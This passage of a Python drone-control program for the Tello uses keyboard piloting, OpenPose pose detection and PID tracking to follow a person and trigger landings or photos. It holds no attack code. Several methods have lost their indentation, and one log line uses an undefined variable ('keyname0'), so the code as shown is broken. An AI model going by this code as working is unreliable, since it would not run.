    Return the yaw (heading) of the quaternion (qx, qy, qz, qw),
    truncated to whole degrees.
    """
    # Standard quaternion-to-yaw formula; the original also computed
    # qy*qy and qz*qz into unused locals, removed here.
    degree = pi/180
    siny = 2 * (qw*qz+qx*qy)
    cosy = 1 - 2*(qy*qy+qz*qz)
    yaw = int(atan2(siny, cosy)/degree)
    return yaw
def openpose_worker():
    """
    In 2 processes mode, this is the init and main loop of the child
    """
    # NOTE(review): relies on the module-level 'tello' global created by
    # main() before the worker starts — confirm the child inherits it.
    print("Worker process",os.getpid())
    tello.drone.start_recv_thread()
    tello.init_sounds()
    tello.init_controls()
    tello.op = OP(number_people_max=1, min_size=25, debug=tello.debug)
    while True:
        tello.fps.update()

        # Copy the latest frame the parent wrote into shared memory, so the
        # parent can keep overwriting the buffer while we process.
        frame = np.ctypeslib.as_array(tello.shared_array).copy()
        frame.shape = tello.frame_shape

        frame = tello.process_frame(frame)
        cv2.imshow("Processed", frame)
        tello.sound_player.play()
        # waitKey(1) also pumps the OpenCV GUI event loop.
        cv2.waitKey(1)
def main(use_multiprocessing=False, log_level=None):
    """
    Create and run a tello controller :
    1) get the video stream from the tello
    2) wait for keyboard commands to pilot the tello
    3) optionally, process the video frames to track a body and pilot the tello accordingly.
    If use_multiprocessing is True, the parent process creates a child process ('worker')
    and the workload is shared between the 2 processes.
    The parent process job is to:
    - get the video stream from the tello and display it in an OpenCV window,
    - write each frame in shared memory at destination of the child,
    each frame replacing the previous one (more efficient than a pipe or a queue),
    - read potential command from the child (currently, only one command: EXIT).
    Commands are transmitted by a Pipe.
    The child process is responsible of all the other tasks:
    - process the frames read in shared memory (openpose, write_hud),
    - if enabled, do the tracking (calculate drone commands from position of body),
    - read keyboard commands,
    - transmit commands (from tracking or from keyboard) to the tello, and receive messages from the tello.
    """
    global tello
    if use_multiprocessing:
        # Create the pipe for the communication between the 2 processes
        parent_cnx, child_cnx = Pipe()
    else:
        child_cnx = None
    tello = TelloController(use_face_tracking=True,
                kbd_layout="AZERTY",
                write_log_data=False,
                log_level=log_level, child_cnx=child_cnx)
    first_frame = True
    # Skip the first 300 frames to let the decoder catch up with the stream
    frame_skip = 300
    for frame in tello.container.decode(video=0):
        if 0 < frame_skip:
            frame_skip = frame_skip - 1
            continue
        start_time = time.time()
        if frame.time_base < 1.0/60:
            time_base = 1.0/60
        else:
            time_base = frame.time_base
        # Convert frame to cv2 image
        frame = cv2.cvtColor(np.array(frame.to_image(),dtype=np.uint8), cv2.COLOR_RGB2BGR)
        frame = cv2.resize(frame, (640,480))
        if use_multiprocessing:
            if first_frame:
                # Create the shared memory to share the current frame decoded by the parent process
                # and given to the child process for further processing (openpose, write_hud,...)
                frame_as_ctypes = np.ctypeslib.as_ctypes(frame)
                tello.shared_array = sharedctypes.RawArray(frame_as_ctypes._type_, frame_as_ctypes)
                tello.frame_shape = frame.shape
                first_frame = False
                # Launch process child
                p_worker = Process(target=openpose_worker)
                p_worker.start()
            # Write the current frame in shared memory
            tello.shared_array[:] = np.ctypeslib.as_ctypes(frame.copy())
            # Check if there is some message from the child
            if parent_cnx.poll():
                msg = parent_cnx.recv()
                if msg == "EXIT":
                    print("MAIN EXIT")
                    p_worker.join()
                    tello.drone.quit()
                    cv2.destroyAllWindows()
                    exit(0)
        else:
            frame = tello.process_frame(frame)
            tello.sound_player.play()
        if not use_multiprocessing: tello.fps.update()
        # Display the frame
        cv2.imshow('Tello', frame)
        cv2.waitKey(1)
        # Skip as many frames as were decoded while we were busy processing,
        # so that we stay close to real time
        frame_skip = int((time.time() - start_time)/time_base)
class TelloController(object):
    """
    TelloController builds keyboard controls on top of TelloPy as well
    as generating images from the video stream and enabling opencv support
    """

    def __init__(self, use_face_tracking=True,
                 kbd_layout="QWERTY",
                 write_log_data=False,
                 media_directory="media",
                 child_cnx=None,
                 log_level=None):
        # NOTE(review): use_face_tracking is not read anywhere in this
        # constructor (tracking is enabled via toggle_tracking()) — confirm
        # before relying on it.
        self.log_level = log_level
        self.debug = log_level is not None
        # child_cnx: Pipe end to the parent process in 2-process mode,
        # None in single-process mode.
        self.child_cnx = child_cnx
        self.use_multiprocessing = child_cnx is not None
        self.kbd_layout = kbd_layout
        # Flight data
        self.is_flying = False
        self.battery = None
        self.fly_mode = None
        self.throw_fly_timer = 0
        self.tracking_after_takeoff = False
        self.record = False
        self.keydown = False
        self.date_fmt = '%Y-%m-%d_%H%M%S'
        # In 2-process mode, the child process starts the receive thread
        # itself (see openpose_worker), so don't start it here.
        self.drone = tellopy.Tello(start_recv_thread=not self.use_multiprocessing)
        # Map each axis name to the tellopy method that sets its speed
        self.axis_command = {
            "yaw": self.drone.clockwise,
            "roll": self.drone.right,
            "pitch": self.drone.forward,
            "throttle": self.drone.up
        }
        self.axis_speed = { "yaw":0, "roll":0, "pitch":0, "throttle":0}
        self.cmd_axis_speed = { "yaw":0, "roll":0, "pitch":0, "throttle":0}
        self.prev_axis_speed = self.axis_speed.copy()
        self.def_speed = { "yaw":50, "roll":35, "pitch":35, "throttle":80}
        self.write_log_data = write_log_data
        self.reset()
        self.media_directory = media_directory
        if not os.path.isdir(self.media_directory):
            os.makedirs(self.media_directory)
        if self.write_log_data:
            path = 'tello-%s.csv' % datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')
            self.log_file = open(path, 'w')
            self.write_header = True
        self.init_drone()
        if not self.use_multiprocessing:
            self.init_sounds()
            self.init_controls()
        # container for processing the packets into frames
        self.container = av.open(self.drone.get_video_stream())
        self.vid_stream = self.container.streams.video[0]
        self.out_file = None
        self.out_stream = None
        self.out_name = None
        self.start_time = time.time()
        # Setup Openpose (in 2-process mode the child creates its own OP)
        if not self.use_multiprocessing:
            self.op = OP(number_people_max=1, min_size=25, debug=self.debug)
        self.use_openpose = False
        # CameraMorse: trigger commands by covering/uncovering the camera
        # in morse-like patterns ("---" = delayed takeoff, "..." = throw and go)
        self.morse = CameraMorse(display=False)
        self.morse.define_command("---", self.delayed_takeoff)
        self.morse.define_command("...", self.throw_and_go, {'tracking':True})
        self.is_pressed = False
        self.fps = FPS()
        self.exposure = 0
        if self.debug:
            self.graph_pid = RollingGraph(window_name="PID", step_width=2, width=2000, height=500, y_max=200, colors=[(255,255,255),(255,200,0),(0,0,255),(0,255,0)],thickness=[2,2,2,2],threshold=100, waitKey=False)
        # Logging
        self.log_level = log_level
        if log_level is not None:
            if log_level == "info":
                log_level = logging.INFO
            elif log_level == "debug":
                log_level = logging.DEBUG
            log.setLevel(log_level)
            ch = logging.StreamHandler(sys.stdout)
            ch.setLevel(log_level)
            ch.setFormatter(logging.Formatter(fmt='%(asctime)s.%(msecs)03d - %(name)s - %(levelname)s - %(message)s',
                                              datefmt="%H:%M:%S"))
            log.addHandler(ch)
def set_video_encoder_rate(self, rate):
self.drone.set_video_encoder_rate(rate)
self.video_encoder_rate = rate
    def reset (self):
        """
        Reset global variables before a fly
        """
        log.debug("RESET")
        # Reference position: first meaningful MVO reading (see
        # log_data_handler); -1 means "not set yet"
        self.ref_pos_x = -1
        self.ref_pos_y = -1
        self.ref_pos_z = -1
        self.pos_x = -1
        self.pos_y = -1
        self.pos_z = -1
        self.yaw = 0
        self.tracking = False
        # Shoulders width to maintain in "keep distance" mode (None = off)
        self.keep_distance = None
        self.palm_landing = False
        self.palm_landing_approach = False
        # Remaining degrees of a commanded 360° rotation
        self.yaw_to_consume = 0
        self.timestamp_keep_distance = time.time()
        self.wait_before_tracking = None
        self.timestamp_take_picture = None
        self.throw_ongoing = False
        self.scheduled_takeoff = None
        # When in tracking mode, but no body is detected in current frame,
        # we make the drone rotate in the hope to find some body
        # The rotation is done in the same direction as the last rotation done
        self.body_in_prev_frame = False
        self.timestamp_no_body = time.time()
        self.last_rotation_is_cw = True
    def init_drone(self):
        """
        Connect to the drone, start streaming and subscribe to events
        """
        if self.log_level:
            self.drone.log.set_level(2)
        self.drone.connect()
        self.set_video_encoder_rate(2)
        self.drone.start_video()
        self.drone.subscribe(self.drone.EVENT_FLIGHT_DATA,
                             self.flight_data_handler)
        self.drone.subscribe(self.drone.EVENT_LOG_DATA,
                             self.log_data_handler)
        # Fires when a picture taken with take_picture() has been
        # downloaded from the drone
        self.drone.subscribe(self.drone.EVENT_FILE_RECEIVED,
                             self.handle_flight_received)
    def init_sounds(self):
        """Load the audio feedback clips and create the morse-feedback tone."""
        self.sound_player = SoundPlayer(debug=self.debug)
        self.sound_player.load("approaching", "sounds/approaching.ogg")
        self.sound_player.load("keeping distance", "sounds/keeping_distance.ogg")
        self.sound_player.load("landing", "sounds/landing.ogg")
        self.sound_player.load("palm landing", "sounds/palm_landing.ogg")
        self.sound_player.load("taking picture", "sounds/taking_picture.ogg")
        self.sound_player.load("free", "sounds/free.ogg")
        # Tone played while the camera is covered (CameraMorse input)
        self.tone = Tone()
def on_press(self, keyname):
"""
Handler for keyboard listener
"""
if self.keydown:
return
try:
self.keydown = True
keyname = str(keyname).strip('\'')
log.info('KEY PRESS ' + keyname)
if keyname == 'Key.esc':
self.toggle_tracking(False)
# self.tracking = False
self.drone.land()
self.drone.quit()
if self.child_cnx:
# Tell to the parent process that it's time to exit
self.child_cnx.send("EXIT")
cv2.destroyAllWindows()
os._exit(0)
if keyname in self.controls_keypress:
self.controls_keypress[keyname]()
except AttributeError:
log.debug(f'special key {keyname0} pressed')
def on_release(self, keyname):
"""
Reset on key up from keyboard listener
"""
self.keydown = False
keyname = str(keyname).strip('\'')
log.info('KEY RELEASE ' + keyname)
if keyname in self.controls_keyrelease:
key_handler = self.controls_keyrelease[keyname]()
    def set_speed(self, axis, speed):
        """Record the commanded speed for *axis*; process_frame() pushes it to the drone."""
        log.info(f"set speed {axis} {speed}")
        self.cmd_axis_speed[axis] = speed
    def init_controls(self):
        """
        Define keys and add listener

        Two keymaps are defined (QWERTY and AZERTY); only the movement keys
        differ (wasd/qe vs zqsd/ae). self.kbd_layout selects which pair of
        press/release maps is installed.
        """
        controls_keypress_QWERTY = {
            'w': lambda: self.set_speed("pitch", self.def_speed["pitch"]),
            's': lambda: self.set_speed("pitch", -self.def_speed["pitch"]),
            'a': lambda: self.set_speed("roll", -self.def_speed["roll"]),
            'd': lambda: self.set_speed("roll", self.def_speed["roll"]),
            'q': lambda: self.set_speed("yaw", -self.def_speed["yaw"]),
            'e': lambda: self.set_speed("yaw", self.def_speed["yaw"]),
            'i': lambda: self.drone.flip_forward(),
            'k': lambda: self.drone.flip_back(),
            'j': lambda: self.drone.flip_left(),
            'l': lambda: self.drone.flip_right(),
            'Key.left': lambda: self.set_speed("yaw", -1.5*self.def_speed["yaw"]),
            'Key.right': lambda: self.set_speed("yaw", 1.5*self.def_speed["yaw"]),
            'Key.up': lambda: self.set_speed("throttle", self.def_speed["throttle"]),
            'Key.down': lambda: self.set_speed("throttle", -self.def_speed["throttle"]),
            'Key.tab': lambda: self.drone.takeoff(),
            'Key.backspace': lambda: self.drone.land(),
            'p': lambda: self.palm_land(),
            't': lambda: self.toggle_tracking(),
            'o': lambda: self.toggle_openpose(),
            'Key.enter': lambda: self.take_picture(),
            'c': lambda: self.clockwise_degrees(360),
            '0': lambda: self.drone.set_video_encoder_rate(0),
            '1': lambda: self.drone.set_video_encoder_rate(1),
            '2': lambda: self.drone.set_video_encoder_rate(2),
            '3': lambda: self.drone.set_video_encoder_rate(3),
            '4': lambda: self.drone.set_video_encoder_rate(4),
            '5': lambda: self.drone.set_video_encoder_rate(5),
            '7': lambda: self.set_exposure(-1),
            '8': lambda: self.set_exposure(0),
            '9': lambda: self.set_exposure(1)
        }
        # On release, movement keys zero their axis speed
        controls_keyrelease_QWERTY = {
            'w': lambda: self.set_speed("pitch", 0),
            's': lambda: self.set_speed("pitch", 0),
            'a': lambda: self.set_speed("roll", 0),
            'd': lambda: self.set_speed("roll", 0),
            'q': lambda: self.set_speed("yaw", 0),
            'e': lambda: self.set_speed("yaw", 0),
            'Key.left': lambda: self.set_speed("yaw", 0),
            'Key.right': lambda: self.set_speed("yaw", 0),
            'Key.up': lambda: self.set_speed("throttle", 0),
            'Key.down': lambda: self.set_speed("throttle", 0)
        }
        controls_keypress_AZERTY = {
            'z': lambda: self.set_speed("pitch", self.def_speed["pitch"]),
            's': lambda: self.set_speed("pitch", -self.def_speed["pitch"]),
            'q': lambda: self.set_speed("roll", -self.def_speed["roll"]),
            'd': lambda: self.set_speed("roll", self.def_speed["roll"]),
            'a': lambda: self.set_speed("yaw", -self.def_speed["yaw"]),
            'e': lambda: self.set_speed("yaw", self.def_speed["yaw"]),
            'i': lambda: self.drone.flip_forward(),
            'k': lambda: self.drone.flip_back(),
            'j': lambda: self.drone.flip_left(),
            'l': lambda: self.drone.flip_right(),
            'Key.left': lambda: self.set_speed("yaw", -1.5*self.def_speed["yaw"]),
            'Key.right': lambda: self.set_speed("yaw", 1.5*self.def_speed["yaw"]),
            'Key.up': lambda: self.set_speed("throttle", self.def_speed["throttle"]),
            'Key.down': lambda: self.set_speed("throttle", -self.def_speed["throttle"]),
            'Key.tab': lambda: self.drone.takeoff(),
            'Key.backspace': lambda: self.drone.land(),
            'p': lambda: self.palm_land(),
            't': lambda: self.toggle_tracking(),
            'o': lambda: self.toggle_openpose(),
            'Key.enter': lambda: self.take_picture(),
            'c': lambda: self.clockwise_degrees(360),
            '0': lambda: self.drone.set_video_encoder_rate(0),
            '1': lambda: self.drone.set_video_encoder_rate(1),
            '2': lambda: self.drone.set_video_encoder_rate(2),
            '3': lambda: self.drone.set_video_encoder_rate(3),
            '4': lambda: self.drone.set_video_encoder_rate(4),
            '5': lambda: self.drone.set_video_encoder_rate(5),
            '7': lambda: self.set_exposure(-1),
            '8': lambda: self.set_exposure(0),
            '9': lambda: self.set_exposure(1)
        }
        controls_keyrelease_AZERTY = {
            'z': lambda: self.set_speed("pitch", 0),
            's': lambda: self.set_speed("pitch", 0),
            'q': lambda: self.set_speed("roll", 0),
            'd': lambda: self.set_speed("roll", 0),
            'a': lambda: self.set_speed("yaw", 0),
            'e': lambda: self.set_speed("yaw", 0),
            'Key.left': lambda: self.set_speed("yaw", 0),
            'Key.right': lambda: self.set_speed("yaw", 0),
            'Key.up': lambda: self.set_speed("throttle", 0),
            'Key.down': lambda: self.set_speed("throttle", 0)
        }
        if self.kbd_layout == "AZERTY":
            self.controls_keypress = controls_keypress_AZERTY
            self.controls_keyrelease = controls_keyrelease_AZERTY
        else:
            self.controls_keypress = controls_keypress_QWERTY
            self.controls_keyrelease = controls_keyrelease_QWERTY
        self.key_listener = keyboard.Listener(on_press=self.on_press,
                                              on_release=self.on_release)
        self.key_listener.start()
    def check_pose(self, w, h):
        """
        Check if we detect a pose in the body detected by Openpose.

        Returns the name of the recognized pose (e.g. "RIGHT_ARM_UP_OPEN",
        "HANDS_ON_NECK", ...) or None. Also updates self.shoulders_width,
        used elsewhere for the "keep distance" mode.
        w, h: frame dimensions. NOTE(review): currently unread here — confirm
        before removing from the signature.
        """
        neck = self.op.get_body_kp("Neck")
        r_wrist = self.op.get_body_kp("RWrist")
        l_wrist = self.op.get_body_kp("LWrist")
        r_elbow = self.op.get_body_kp("RElbow")
        l_elbow = self.op.get_body_kp("LElbow")
        r_shoulder = self.op.get_body_kp("RShoulder")
        l_shoulder = self.op.get_body_kp("LShoulder")
        r_ear = self.op.get_body_kp("REar")
        l_ear = self.op.get_body_kp("LEar")
        self.shoulders_width = distance(r_shoulder,l_shoulder) if r_shoulder and l_shoulder else None
        vert_angle_right_arm = vertical_angle(r_wrist, r_elbow)
        vert_angle_left_arm = vertical_angle(l_wrist, l_elbow)
        # "Hand up" = wrist above the neck (image y axis points down)
        left_hand_up = neck and l_wrist and l_wrist[1] < neck[1]
        right_hand_up = neck and r_wrist and r_wrist[1] < neck[1]
        if right_hand_up:
            if not left_hand_up:
                # Only right arm up
                if r_ear and (r_ear[0]-neck[0])*(r_wrist[0]-neck[0])>0:
                    # Right ear and right hand on the same side
                    if vert_angle_right_arm:
                        if vert_angle_right_arm < -15:
                            return "RIGHT_ARM_UP_OPEN"
                        if 15 < vert_angle_right_arm < 90:
                            return "RIGHT_ARM_UP_CLOSED"
                elif l_ear and self.shoulders_width and distance(r_wrist,l_ear) < self.shoulders_width/4:
                    # Right hand close to left ear
                    return "RIGHT_HAND_ON_LEFT_EAR"
            else:
                # Both hands up
                # Check if both hands are on the ears
                if r_ear and l_ear:
                    ear_dist = distance(r_ear,l_ear)
                    if distance(r_wrist,r_ear)<ear_dist/3 and distance(l_wrist,l_ear)<ear_dist/3:
                        return("HANDS_ON_EARS")
                # Check if both hands are close to each other and above the ears
                # (checking that the right hand is above the right ear is enough
                # since the hands are close to each other)
                if self.shoulders_width and r_ear:
                    near_dist = self.shoulders_width/3
                    if r_ear[1] > r_wrist[1] and distance(r_wrist, l_wrist) < near_dist :
                        return "CLOSE_HANDS_UP"
        else:
            if left_hand_up:
                # Only left arm up
                if l_ear and (l_ear[0]-neck[0])*(l_wrist[0]-neck[0])>0:
                    # Left ear and left hand on the same side
                    if vert_angle_left_arm:
                        if vert_angle_left_arm < -15:
                            return "LEFT_ARM_UP_CLOSED"
                        if 15 < vert_angle_left_arm < 90:
                            return "LEFT_ARM_UP_OPEN"
                elif r_ear and self.shoulders_width and distance(l_wrist,r_ear) < self.shoulders_width/4:
                    # Left hand close to right ear
                    return "LEFT_HAND_ON_RIGHT_EAR"
            else:
                # Both wrists under the neck
                if neck and self.shoulders_width and r_wrist and l_wrist:
                    near_dist = self.shoulders_width/3
                    if distance(r_wrist, neck) < near_dist and distance(l_wrist, neck) < near_dist :
                        return "HANDS_ON_NECK"
        return None
    def process_frame(self, raw_frame):
        """
        Analyze the frame and return the frame with information (HUD,
        openpose skeleton) drawn on it.

        This is also where the piloting decisions are made: scheduled
        takeoff, 360° exploration, pose-triggered actions, tracking PIDs,
        and finally sending the axis speeds to the drone.
        """
        frame = raw_frame.copy()
        h,w,_ = frame.shape
        # Target shoulders width used when approaching for a palm landing
        proximity = int(w/2.6)
        min_distance = int(w/2)
        # Is there a scheduled takeoff ?
        if self.scheduled_takeoff and time.time() > self.scheduled_takeoff:
            self.scheduled_takeoff = None
            self.drone.takeoff()
        # Start from the keyboard-commanded speeds; tracking may override below
        self.axis_speed = self.cmd_axis_speed.copy()
        # If we are about to take a picture, the tracking is temporarily deactivated (2s)
        if self.timestamp_take_picture:
            if time.time() - self.timestamp_take_picture > 2:
                self.timestamp_take_picture = None
                self.drone.take_picture()
        else:
            # If we are doing a 360, where are we in our 360 ?
            if self.yaw_to_consume > 0:
                consumed = self.yaw - self.prev_yaw
                self.prev_yaw = self.yaw
                if consumed < 0: consumed += 360
                self.yaw_consumed += consumed
                if self.yaw_consumed > self.yaw_to_consume:
                    self.yaw_to_consume = 0
                    self.axis_speed["yaw"] = 0
                else:
                    self.axis_speed["yaw"] = self.def_speed["yaw"]
            # We are not flying, we check a potential morse code
            if not self.is_flying:
                pressing, detected = self.morse.eval(frame)
                # Audio feedback while the camera is covered
                if self.is_pressed and not pressing:
                    self.tone.off()
                elif not self.is_pressed and pressing:
                    self.tone.on()
                self.is_pressed = pressing
            # Call to openpose detection
            if self.use_openpose:
                nb_people, pose_kps, face_kps = self.op.eval(frame)
                target = None
                # Our target is the person whose index is 0 in pose_kps
                self.pose = None
                if nb_people > 0 :
                    # We found a body, so we can cancel the exploring 360
                    self.yaw_to_consume = 0
                    # Do we recognize a predefined pose ?
                    self.pose = self.check_pose(w,h)
                    if self.pose:
                        # We trigger the associated action
                        log.info(f"pose detected : {self.pose}")
                        if self.pose == "HANDS_ON_NECK" or self.pose == "HANDS_ON_EARS":
                            # Take a picture in 1 second
                            if self.timestamp_take_picture is None:
                                log.info("Take a picture in 1 second")
                                self.timestamp_take_picture = time.time()
                                self.sound_player.play("taking picture")
                        elif self.pose == "RIGHT_ARM_UP_CLOSED":
                            log.info("GOING LEFT from pose")
                            self.axis_speed["roll"] = self.def_speed["roll"]
                        elif self.pose == "RIGHT_ARM_UP_OPEN":
                            log.info("GOING RIGHT from pose")
                            self.axis_speed["roll"] = -self.def_speed["roll"]
                        elif self.pose == "LEFT_ARM_UP_CLOSED":
                            log.info("GOING FORWARD from pose")
                            self.axis_speed["pitch"] = self.def_speed["pitch"]
                        elif self.pose == "LEFT_ARM_UP_OPEN":
                            log.info("GOING BACKWARD from pose")
                            self.axis_speed["pitch"] = -self.def_speed["pitch"]
                        elif self.pose == "CLOSE_HANDS_UP":
                            # Locked distance mode (toggle; the 2s timestamp check
                            # debounces the pose over consecutive frames)
                            if self.keep_distance is None:
                                if time.time() - self.timestamp_keep_distance > 2:
                                    # The first frame of a series to activate the distance keeping
                                    self.keep_distance = self.shoulders_width
                                    self.timestamp_keep_distance = time.time()
                                    log.info(f"KEEP DISTANCE {self.keep_distance}")
                                    self.pid_pitch = PID(0.5,0.04,0.3,setpoint=0,output_limits=(-50,50))
                                    self.sound_player.play("keeping distance")
                            else:
                                if time.time() - self.timestamp_keep_distance > 2:
                                    log.info("KEEP DISTANCE FINISHED")
                                    self.sound_player.play("free")
                                    self.keep_distance = None
                                    self.timestamp_keep_distance = time.time()
                        elif self.pose == "RIGHT_HAND_ON_LEFT_EAR":
                            # Get close to the body then palm landing
                            if not self.palm_landing_approach:
                                self.palm_landing_approach = True
                                self.keep_distance = proximity
                                self.timestamp_keep_distance = time.time()
                                log.info("APPROACHING on pose")
                                self.pid_pitch = PID(0.2,0.02,0.1,setpoint=0,output_limits=(-45,45))
                                self.sound_player.play("approaching")
                        elif self.pose == "LEFT_HAND_ON_RIGHT_EAR":
                            if not self.palm_landing:
                                log.info("LANDING on pose")
                                # Landing
                                self.toggle_tracking(tracking=False)
                                self.drone.land()
                    # Draw the skeleton on the frame
                    self.op.draw_body(frame)
                    # In tracking mode, we track a specific body part (an openpose keypoint):
                    # the nose if visible, otherwise the neck, otherwise the midhip
                    # The tracker tries to align that body part with the reference point (ref_x, ref_y)
                    target = self.op.get_body_kp("Nose")
                    if target is not None:
                        ref_x = int(w/2)
                        ref_y = int(h*0.35)
                    else:
                        target = self.op.get_body_kp("Neck")
                        if target is not None:
                            ref_x = int(w/2)
                            ref_y = int(h/2)
                        else:
                            target = self.op.get_body_kp("MidHip")
                            if target is not None:
                                ref_x = int(w/2)
                                ref_y = int(0.75*h)
                if self.tracking:
                    if target:
                        self.body_in_prev_frame = True
                        # We draw an arrow from the reference point to the body part we are targeting
                        h,w,_ = frame.shape
                        xoff = int(target[0]-ref_x)
                        yoff = int(ref_y-target[1])
                        cv2.circle(frame, (ref_x, ref_y), 15, (250,150,0), 1,cv2.LINE_AA)
                        cv2.arrowedLine(frame, (ref_x, ref_y), target, (250, 150, 0), 6)
                        # The PID controllers calculate the new speeds for yaw and throttle
                        self.axis_speed["yaw"] = int(-self.pid_yaw(xoff))
                        log.debug(f"xoff: {xoff} - speed_yaw: {self.axis_speed['yaw']}")
                        self.last_rotation_is_cw = self.axis_speed["yaw"] > 0
                        self.axis_speed["throttle"] = int(-self.pid_throttle(yoff))
                        log.debug(f"yoff: {yoff} - speed_throttle: {self.axis_speed['throttle']}")
                        # If in locked distance mode
                        if self.keep_distance and self.shoulders_width:
                            if self.palm_landing_approach and self.shoulders_width>self.keep_distance:
                                # The drone is now close enough to the body
                                # Let's do the palm landing
                                log.info("PALM LANDING after approaching")
                                self.palm_landing_approach = False
                                self.toggle_tracking(tracking=False)
                                self.palm_land()
                            else:
                                self.axis_speed["pitch"] = int(self.pid_pitch(self.shoulders_width-self.keep_distance))
                                log.debug(f"Target distance: {self.keep_distance} - cur: {self.shoulders_width} -speed_pitch: {self.axis_speed['pitch']}")
                    else: # Tracking but no body detected
                        if self.body_in_prev_frame:
                            self.timestamp_no_body = time.time()
                            self.body_in_prev_frame = False
                            self.axis_speed["throttle"] = self.prev_axis_speed["throttle"]
                            self.axis_speed["yaw"] = self.prev_axis_speed["yaw"]
                        else:
                            if time.time() - self.timestamp_no_body < 1:
                                print("NO BODY SINCE < 1", self.axis_speed, self.prev_axis_speed)
                                self.axis_speed["throttle"] = self.prev_axis_speed["throttle"]
                                self.axis_speed["yaw"] = self.prev_axis_speed["yaw"]
                            else:
                                log.debug("NO BODY detected for 1s -> rotate")
                                # Rotate in the same direction as the last rotation,
                                # hoping to find the body again
                                self.axis_speed["yaw"] = self.def_speed["yaw"] * (1 if self.last_rotation_is_cw else -1)
            # Send axis commands to the drone (only when the value changed)
            for axis, command in self.axis_command.items():
                if self.axis_speed[axis] is not None and self.axis_speed[axis] != self.prev_axis_speed[axis]:
                    log.debug(f"COMMAND {axis} : {self.axis_speed[axis]}")
                    command(self.axis_speed[axis])
                    self.prev_axis_speed[axis] = self.axis_speed[axis]
                else:
                    # This line is necessary to display current values in 'self.write_hud'
                    self.axis_speed[axis] = self.prev_axis_speed[axis]
        # Write the HUD on the frame
        frame = self.write_hud(frame)
        return frame
    def write_hud(self, frame):
        """
        Draw drone info on frame

        Returns the frame with one line of text per piece of status
        information (FPS, battery, flying/tracking state, axis speeds, ...).
        """
        class HUD:
            # Small helper accumulating (text, color) lines, then drawing
            # them top to bottom with cv2.putText.
            def __init__(self, def_color=(255, 170, 0)):
                self.def_color = def_color
                self.infos = []
            def add(self, info, color=None):
                if color is None: color = self.def_color
                self.infos.append((info, color))
            def draw(self, frame):
                i=0
                for (info, color) in self.infos:
                    cv2.putText(frame, info, (0, 30 + (i * 30)),
                                cv2.FONT_HERSHEY_SIMPLEX,
                                1.0, color, 2) #lineType=30)
                    i+=1
        hud = HUD()
        if self.debug: hud.add(datetime.datetime.now().strftime('%H:%M:%S'))
        hud.add(f"FPS {self.fps.get():.2f}")
        if self.debug: hud.add(f"VR {self.video_encoder_rate}")
        hud.add(f"BAT {self.battery}")
        if self.is_flying:
            hud.add("FLYING", (0,255,0))
        else:
            hud.add("NOT FLYING", (0,0,255))
        hud.add(f"TRACKING {'ON' if self.tracking else 'OFF'}", (0,255,0) if self.tracking else (0,0,255) )
        hud.add(f"EXPO {self.exposure}")
        # One line per axis: green when moving one way, red the other
        if self.axis_speed['yaw'] > 0:
            hud.add(f"CW {self.axis_speed['yaw']}", (0,255,0))
        elif self.axis_speed['yaw'] < 0:
            hud.add(f"CCW {-self.axis_speed['yaw']}", (0,0,255))
        else:
            hud.add(f"CW 0")
        if self.axis_speed['roll'] > 0:
            hud.add(f"RIGHT {self.axis_speed['roll']}", (0,255,0))
        elif self.axis_speed['roll'] < 0:
            hud.add(f"LEFT {-self.axis_speed['roll']}", (0,0,255))
        else:
            hud.add(f"RIGHT 0")
        if self.axis_speed['pitch'] > 0:
            hud.add(f"FORWARD {self.axis_speed['pitch']}", (0,255,0))
        elif self.axis_speed['pitch'] < 0:
            hud.add(f"BACKWARD {-self.axis_speed['pitch']}", (0,0,255))
        else:
            hud.add(f"FORWARD 0")
        if self.axis_speed['throttle'] > 0:
            hud.add(f"UP {self.axis_speed['throttle']}", (0,255,0))
        elif self.axis_speed['throttle'] < 0:
            hud.add(f"DOWN {-self.axis_speed['throttle']}", (0,0,255))
        else:
            hud.add(f"UP 0")
        if self.use_openpose: hud.add(f"POSE: {self.pose}", (0,255,0) if self.pose else (255, 170, 0))
        if self.keep_distance:
            hud.add(f"Target distance: {self.keep_distance} - curr: {self.shoulders_width}", (0,255,0))
        if self.timestamp_take_picture: hud.add("Taking a picture", (0,255,0))
        if self.palm_landing:
            hud.add("Palm landing...", (0,255,0))
        if self.palm_landing_approach:
            hud.add("In approach for palm landing...", (0,255,0))
        if self.tracking and not self.body_in_prev_frame and time.time() - self.timestamp_no_body > 0.5:
            hud.add("Searching...", (0,255,0))
        if self.throw_ongoing:
            hud.add("Throw ongoing...", (0,255,0))
        if self.scheduled_takeoff:
            seconds_left = int(self.scheduled_takeoff - time.time())
            hud.add(f"Takeoff in {seconds_left}s")
        hud.draw(frame)
        return frame
def take_picture(self):
"""
Tell drone to take picture, image sent to file handler
"""
self.drone.take_picture()
def set_exposure(self, expo):
"""
Change exposure of drone camera
"""
if expo == 0:
self.exposure = 0
elif expo == 1:
self.exposure = min(9, self.exposure+1)
elif expo == -1:
self.exposure = max(-9, self.exposure-1)
self.drone.set_exposure(self.exposure)
log.info(f"EXPOSURE {self.exposure}")
    def palm_land(self):
        """
        Tell drone to do a palm landing (land on an outstretched hand)
        """
        self.palm_landing = True
        self.sound_player.play("palm landing")
        self.drone.palm_land()
def throw_and_go(self, tracking=False):
"""
Tell drone to start a 'throw and go'
"""
self.drone.throw_and_go()
self.tracking_after_takeoff = tracking
def delayed_takeoff(self, delay=5):
self.scheduled_takeoff = time.time()+delay
self.tracking_after_takeoff = True
def clockwise_degrees(self, degrees):
self.yaw_to_consume = degrees
self.yaw_consumed = 0
self.prev_yaw = self.yaw
    def toggle_openpose(self):
        """Enable/disable the Openpose body detection."""
        self.use_openpose = not self.use_openpose
        if not self.use_openpose:
            # Tracking cannot work without Openpose, so deactivate it too
            self.toggle_tracking(tracking=False)
        log.info('OPENPOSE '+("ON" if self.use_openpose else "OFF"))
def toggle_tracking(self, tracking=None):
"""
If tracking is None, toggle value of self.tracking
Else self.tracking take the same value as tracking
"""
if tracking is None:
self.tracking = not self.tracking
else:
self.tracking = tracking
if self.tracking:
log.info("ACTIVATE TRACKING")
# Needs openpose
self.use_openpose = True
# Start an explarotary 360
#self.clockwise_degrees(360)
# Init a PID controller for the yaw
self.pid_yaw = PID(0.25,0,0,setpoint=0,output_limits=(-100,100))
# ... and one for the throttle
self.pid_throttle = PID(0.4,0,0,setpoint=0,output_limits=(-80,100))
# self.init_tracking = True
else:
self.axis_speed = { "yaw":0, "roll":0, "pitch":0, "throttle":0}
self.keep_distance = None
return
    def flight_data_handler(self, event, sender, data):
        """
        Listener to flight data from the drone.

